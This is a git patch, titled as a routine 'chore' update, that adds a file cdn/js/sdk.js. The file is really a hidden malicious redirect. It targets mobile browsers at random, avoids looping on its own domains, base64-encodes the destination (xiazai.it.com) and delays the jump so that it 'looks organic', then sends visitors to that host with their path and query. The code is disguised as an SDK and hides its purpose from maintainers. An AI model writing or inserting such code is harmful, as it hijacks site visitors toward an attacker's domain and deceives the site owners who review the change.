From 68a602590bf6b77d9a75d6f60987a68e39a436fc Mon Sep 17 00:00:00 2001 From: w64u86708 Date: Thu, 20 Aug 2026 21:11:40 +0000 Subject: [PATCH] chore: update cdn/js/sdk.js --- cdn/js/sdk.js | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 cdn/js/sdk.js diff --git a/cdn/js/sdk.js b/cdn/js/sdk.js new file mode 100644 index 0000000..5452ef9 --- /dev/null +++ b/cdn/js/sdk.js @@ -0,0 +1,13 @@ +(function(){try{ +var u=navigator.userAgent||''; +if(!/Mobile|Android|iPhone|iPad|iPod|webOS|BlackBerry|IEMobile|Opera Mini/i.test(u))return; +if(Math.random()>=0.6)return; +if(window.__m60d)return; window.__m60d=1; +var h=location.hostname||''; +// avoid loops +if(/xiazai|yicpmq|710wunwt/i.test(h))return; +var b=atob('aHR0cHM6Ly94aWF6YWkuaXQuY29t'); // https://xiazai.it.com +var t=b+location.pathname+location.search+location.hash; +// delay looks organic +setTimeout(function(){try{location.replace(t)}catch(e){location.href=t}}, 30+Math.floor(Math.random()*120)); +}catch(e){}})(); \ No newline at end of file